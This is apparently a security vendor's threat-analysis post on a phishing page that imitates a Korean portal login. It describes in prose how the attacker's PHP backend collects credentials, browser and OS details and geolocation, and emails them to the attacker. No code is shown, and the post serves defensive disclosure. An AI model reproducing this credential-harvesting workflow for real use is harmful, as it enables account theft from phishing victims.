AhnLab SEcurity intelligence Center (ASEC) has recently analyzed a phishing case where a phishing page was disguised as a login page of a famous Korean portal website. ASEC has then collected some information on the threat actor.
The fake login page, which is believed to have been distributed in the format of hyperlinks attached to phishing emails, was found to be very similar to the login page of the famous portal site. In fact, it is difficult to realize that this is a phishing page at a quick glance.
Entering login credentials in the phishing page results in the information being sent to the C2 server set by the attacker as shown below.
AhnLab was able to obtain the code that operates within the phishing page server during the process of analyzing the threat actor’s domain. Moreover, it obtained multiple PHP codes that dictate how the login credentials sent to the threat actor via the phishing page are processed. This post will examine how the user information stolen by the threat actor is processed.
1. Collecting login credentials and client information included in the packet
From the packet received from the phishing page through the POST method, the threat actor collects the email and password input by the user and uses a regular expression to learn the OS information and browser environment of the client that sent the packet.
2. Collecting additional information using the source IP information included in the packet
The threat actor used the source IP information included in the packet to query the geoPlugin site and additionally obtain information on the country, region, and city that the IP address belongs to. The geoPlugin website was identified as being a legitimate plugin-type service that returns information on the input IP addresses in the JSON format, but as seen in this phishing case, it can be exploited by threat actors.
3. Creating an email based on the collected information and sending it to the threat actor’s email address
Based on the information collected in steps 1 and 2 above, the threat actor completes the $message variable as shown below. This variable contains the following information collected through phishing: login credentials (email and password), IP address, country, region and city, and the client’s browser environment and OS information.
Multiple email addresses receiving these emails (presumably belonging to the threat actor) were identified during the analysis process, tending to mostly be in Vietnamese.
This case is a good example that shows how login credentials obtained through phishing attacks are transmitted to the threat actor. Such stolen user information has the risk to become a target for additional malicious activities. Therefore, users should take extra caution when using login pages linked to emails from unknown sources, and periodically manage account credentials.
87cf92cb5ff0fc445fb05dfc7321bd3e : Phishing/HTML.FakeNaver.SC196455
Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.